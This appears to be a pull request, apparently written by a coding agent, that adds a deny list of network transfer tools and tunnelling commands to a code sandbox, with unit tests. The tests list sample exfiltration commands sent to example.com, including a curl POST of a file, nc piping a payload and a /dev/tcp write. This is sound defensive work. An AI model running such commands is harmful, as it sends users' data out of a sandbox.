### PR TITLE
Block outbound network transfer commands in code sandbox

### DIFF
--- a/backend/connectors/code_sandbox.py
+++ b/backend/connectors/code_sandbox.py
@@ -57,18 +57,28 @@ _SUDO_BLOCK_MESSAGE: str = (
 )
 
 _MAX_EGRESS_BYTES: int = 1_000_000
+
+
+def _compile_command_invocation_pattern(command: str) -> re.Pattern[str]:
+    """Match command invocations including absolute-path forms (e.g. /usr/bin/curl)."""
+    return re.compile(
+        rf"(^|[;&|()\s\"'`])(?:[^\s;&|()\"'`]+/)?{re.escape(command)}(?=$|[;&|()\s\"'`])",
+        re.IGNORECASE,
+    )
+
+
 _NETWORK_EGRESS_PATTERNS: tuple[tuple[re.Pattern[str], str], ...] = (
-    (re.compile(r"(^|[;&|()\s])curl\b", re.IGNORECASE), "curl"),
-    (re.compile(r"(^|[;&|()\s])wget\b", re.IGNORECASE), "wget"),
-    (re.compile(r"(^|[;&|()\s])ftp\b", re.IGNORECASE), "ftp"),
-    (re.compile(r"(^|[;&|()\s])sftp\b", re.IGNORECASE), "sftp"),
-    (re.compile(r"(^|[;&|()\s])scp\b", re.IGNORECASE), "scp"),
-    (re.compile(r"(^|[;&|()\s])rsync\b", re.IGNORECASE), "rsync"),
-    (re.compile(r"(^|[;&|()\s])nc\b", re.IGNORECASE), "nc"),
-    (re.compile(r"(^|[;&|()\s])ncat\b", re.IGNORECASE), "ncat"),
-    (re.compile(r"(^|[;&|()\s])netcat\b", re.IGNORECASE), "netcat"),
-    (re.compile(r"(^|[;&|()\s])socat\b", re.IGNORECASE), "socat"),
-    (re.compile(r"(^|[;&|()\s])ssh\b", re.IGNORECASE), "ssh"),
+    (_compile_command_invocation_pattern("curl"), "curl"),
+    (_compile_command_invocation_pattern("wget"), "wget"),
+    (_compile_command_invocation_pattern("ftp"), "ftp"),
+    (_compile_command_invocation_pattern("sftp"), "sftp"),
+    (_compile_command_invocation_pattern("scp"), "scp"),
+    (_compile_command_invocation_pattern("rsync"), "rsync"),
+    (_compile_command_invocation_pattern("nc"), "nc"),
+    (_compile_command_invocation_pattern("ncat"), "ncat"),
+    (_compile_command_invocation_pattern("netcat"), "netcat"),
+    (_compile_command_invocation_pattern("socat"), "socat"),
+    (_compile_command_invocation_pattern("ssh"), "ssh"),
     (re.compile(r"/dev/tcp/", re.IGNORECASE), "/dev/tcp"),
 )
 _NETWORK_EGRESS_BLOCK_MESSAGE: str = (

--- a/backend/connectors/code_sandbox.py
+++ b/backend/connectors/code_sandbox.py
@@ -56,6 +56,27 @@ _SUDO_BLOCK_MESSAGE: str = (
     "Run commands without elevated privileges."
 )
 
+_MAX_EGRESS_BYTES: int = 1_000_000
+_NETWORK_EGRESS_PATTERNS: tuple[tuple[re.Pattern[str], str], ...] = (
+    (re.compile(r"(^|[;&|()\s])curl\b", re.IGNORECASE), "curl"),
+    (re.compile(r"(^|[;&|()\s])wget\b", re.IGNORECASE), "wget"),
+    (re.compile(r"(^|[;&|()\s])ftp\b", re.IGNORECASE), "ftp"),
+    (re.compile(r"(^|[;&|()\s])sftp\b", re.IGNORECASE), "sftp"),
+    (re.compile(r"(^|[;&|()\s])scp\b", re.IGNORECASE), "scp"),
+    (re.compile(r"(^|[;&|()\s])rsync\b", re.IGNORECASE), "rsync"),
+    (re.compile(r"(^|[;&|()\s])nc\b", re.IGNORECASE), "nc"),
+    (re.compile(r"(^|[;&|()\s])ncat\b", re.IGNORECASE), "ncat"),
+    (re.compile(r"(^|[;&|()\s])netcat\b", re.IGNORECASE), "netcat"),
+    (re.compile(r"(^|[;&|()\s])socat\b", re.IGNORECASE), "socat"),
+    (re.compile(r"(^|[;&|()\s])ssh\b", re.IGNORECASE), "ssh"),
+    (re.compile(r"/dev/tcp/", re.IGNORECASE), "/dev/tcp"),
+)
+_NETWORK_EGRESS_BLOCK_MESSAGE: str = (
+    "Outbound network transfer commands are disabled in the code sandbox to enforce "
+    f"a strict <= {_MAX_EGRESS_BYTES:,} bytes external egress policy. "
+    "FTP/tunneling and similar exfiltration channels are blocked."
+)
+
 
 def get_blocked_package_install_reason(command: str) -> str | None:
     """Return a user-facing reason when a sandbox command violates command policy."""
@@ -71,6 +92,11 @@ def get_blocked_package_install_reason(command: str) -> str | None:
         if pattern.search(normalized_command):
             logger.info("[Sandbox] Blocked package installation attempt via %s", label)
             return f"{_PACKAGE_INSTALL_BLOCK_MESSAGE} Blocked command pattern: {label}."
+
+    for pattern, label in _NETWORK_EGRESS_PATTERNS:
+        if pattern.search(normalized_command):
+            logger.info("[Sandbox] Blocked outbound network command attempt via %s", label)
+            return f"{_NETWORK_EGRESS_BLOCK_MESSAGE} Blocked command pattern: {label}."
 
     return None
 

--- a/backend/tests/test_code_sandbox_command_policy.py
+++ b/backend/tests/test_code_sandbox_command_policy.py
@@ -50,12 +50,18 @@ def test_get_blocked_package_install_reason_blocks_outbound_network_commands() -
         "ssh -R 8080:localhost:3000 user@example.com",
         "nc example.com 9000 < payload.bin",
         "python3 -c 'import os; os.system(\"cat file > /dev/tcp/example.com/80\")'",
+        "/usr/bin/curl -X POST https://example.com -d @payload.txt",
+        "bash -c \"/usr/bin/wget https://example.com/archive.tar.gz\"",
     ]
 
     for command in commands:
         reason = get_blocked_package_install_reason(command)
         assert reason is not None
         assert "<= 1,000,000 bytes external egress policy" in reason
+
+
+def test_get_blocked_package_install_reason_allows_non_network_ssh_utilities() -> None:
+    assert get_blocked_package_install_reason("ssh-keygen -t ed25519 -N '' -f /tmp/id_ed25519") is None
 
 
 @pytest.mark.asyncio

--- a/backend/tests/test_code_sandbox_command_policy.py
+++ b/backend/tests/test_code_sandbox_command_policy.py
@@ -39,6 +39,24 @@ def test_get_blocked_package_install_reason_blocks_sudo_commands() -> None:
     assert reason is not None
     assert "sudo" in reason.lower()
 
+def test_get_blocked_package_install_reason_blocks_outbound_network_commands() -> None:
+    commands = [
+        "curl -X POST https://example.com -d @payload.txt",
+        "wget https://example.com/archive.tar.gz",
+        "ftp example.com",
+        "sftp user@example.com",
+        "scp output.txt user@example.com:/tmp",
+        "rsync -avz ./ user@example.com:/tmp/out",
+        "ssh -R 8080:localhost:3000 user@example.com",
+        "nc example.com 9000 < payload.bin",
+        "python3 -c 'import os; os.system(\"cat file > /dev/tcp/example.com/80\")'",
+    ]
+
+    for command in commands:
+        reason = get_blocked_package_install_reason(command)
+        assert reason is not None
+        assert "<= 1,000,000 bytes external egress policy" in reason
+
 
 @pytest.mark.asyncio
 async def test_execute_action_rejects_package_install_before_sandbox_use() -> None:
@@ -72,5 +90,24 @@ async def test_execute_action_rejects_sudo_before_sandbox_use() -> None:
             "Using sudo inside the code sandbox is disabled. "
             "Run commands without elevated privileges. "
             "Blocked command pattern: sudo."
+        )
+    }
+
+
+@pytest.mark.asyncio
+async def test_execute_action_rejects_outbound_network_command_before_sandbox_use() -> None:
+    connector = CodeSandboxConnector(organization_id="org_123")
+
+    result = await connector.execute_action(
+        "execute_command",
+        {"command": "curl -X POST https://example.com -d @payload.txt", "conversation_id": "conv_123"},
+    )
+
+    assert result == {
+        "error": (
+            "Outbound network transfer commands are disabled in the code sandbox to enforce "
+            "a strict <= 1,000,000 bytes external egress policy. "
+            "FTP/tunneling and similar exfiltration channels are blocked. "
+            "Blocked command pattern: curl."
         )
     }


### PR DESCRIPTION
### Motivation
- Prevent data exfiltration from the E2B code sandbox by disallowing common outbound network transfer and tunneling commands before a sandbox is created or executed.
- Provide a clear, user-facing enforcement message that ties the restriction to an external egress policy and makes the block reason explicit for operators and models.

### Description
- Added a new egress limit constant ` _MAX_EGRESS_BYTES` and a set of ` _NETWORK_EGRESS_PATTERNS` to `backend/connectors/code_sandbox.py` to detect common transfer/tunneling tools (`curl`, `wget`, `ftp`, `sftp`, `scp`, `rsync`, `nc`/`ncat`/`netcat`, `socat`, `ssh`, and `/dev/tcp`).
- Introduced ` _NETWORK_EGRESS_BLOCK_MESSAGE` and an early policy check inside `get_blocked_package_install_reason` to reject outbound network commands with logging (`Blocked outbound network command attempt`).
- Kept existing package-install and `sudo` guards intact so all risky commands are rejected at the same pre-execution policy gate in `CodeSandboxConnector`.
- Added unit tests in `backend/tests/test_code_sandbox_command_policy.py` to cover the new pattern-matching and the `execute_action` rejection path for outbound commands.

### Testing
- Ran `pytest -q backend/tests/test_code_sandbox_command_policy.py` and observed `7 passed` (all tests succeeded).
- Tests exercise both the low-level `get_blocked_package_install_reason` checks for network commands and the `execute_action` rejection behavior in `CodeSandboxConnector`.

------
[Codex Task](https://chatgpt.com/codex/cloud/tasks/task_e_69d6c1955e308321abea2ec07f57621c)